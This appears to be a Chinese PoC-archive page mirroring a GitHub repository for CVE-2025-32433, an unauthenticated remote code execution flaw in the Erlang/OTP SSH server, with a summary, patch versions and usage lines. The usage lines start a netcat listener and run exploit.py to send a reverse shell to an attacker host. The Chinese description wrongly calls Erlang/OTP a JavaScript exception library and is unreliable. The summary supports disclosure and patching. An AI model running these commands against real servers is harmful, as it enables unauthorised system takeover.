支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 424d1d9ed6c9ea118d5a28c368adbc8f70b85923

来源
https://github.com/MrDreamReal/CVE-2025-32433
关联漏洞
标题:Erlang/OTP 访问控制错误漏洞 (CVE-2025-32433)
Description:Erlang/OTP是Erlang/OTP开源的一个JavaScript编写的处理处理异常的库。该库可以捕捉node.js内置API引发的异常。 Erlang/OTP 27.3.3之前版本存在访问控制错误漏洞,该漏洞源于SSH协议消息处理缺陷,可能导致远程代码执行。
Description
CVE-2025-32433 Summary and Attack Overview
介绍
# CVE-2025-32433
CVE-2025-32433 Summary and Attack Overview

CVE-2025-32433 is a critical unauthenticated remote code execution (RCE) vulnerability in the Erlang/OTP SSH server, disclosed on April 16, 2025. Erlang/OTP SSH is a library used in various distributed and telecom applications. The flaw arises from improper handling of SSH protocol messages: the server fails to enforce the normal authentication sequence, allowing an attacker to send specially crafted SSH messages before authentication. By doing so, the attacker can inject and execute arbitrary Erlang code on the server​
nvd.nist.gov
​
offsec.com
. In practical terms, this means an attacker with network access to a vulnerable Erlang/OTP SSH server (often running as root) can trigger a reverse shell or execute commands without any credentials, leading to full system compromise​
nvd.nist.gov
​
offsec.com
. This vulnerability is assigned CVSS 10.0 (maximum severity)​
offsec.com
.

Affected versions are all Erlang/OTP releases below OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20 (the patched versions)​
nvd.nist.gov
​
offsec.com
. Affected systems often include Linux servers or appliances running an Erlang-based SSH daemon (not to be confused with OpenSSH). Importantly, default OpenSSH servers on Linux/BSD are not vulnerable​
offsec.com
. Users should assume any exposed Erlang/OTP SSH server is affected, and apply the official patches or disable the SSH service immediately.

The attack works by initiating an SSH connection and then sending a sequence of SSH messages out of order. :

usage: 

sudo chmod +x exploit.py

nc -nvlp <lport>

python3 exploit.py -t <target-ip> -p 22 --lhost <attcker-ip> --lport <lisner-ip> 

ex: 

nc -nvlp 5555

python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555
文件快照

 [4.0K]  /data/pocs/424d1d9ed6c9ea118d5a28c368adbc8f70b85923
├── [2.2K]  concept for CVE-2025-32433
├── [6.4K]  exploit.py
├── [1.8K]  README.md
└── [ 224]  usage

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。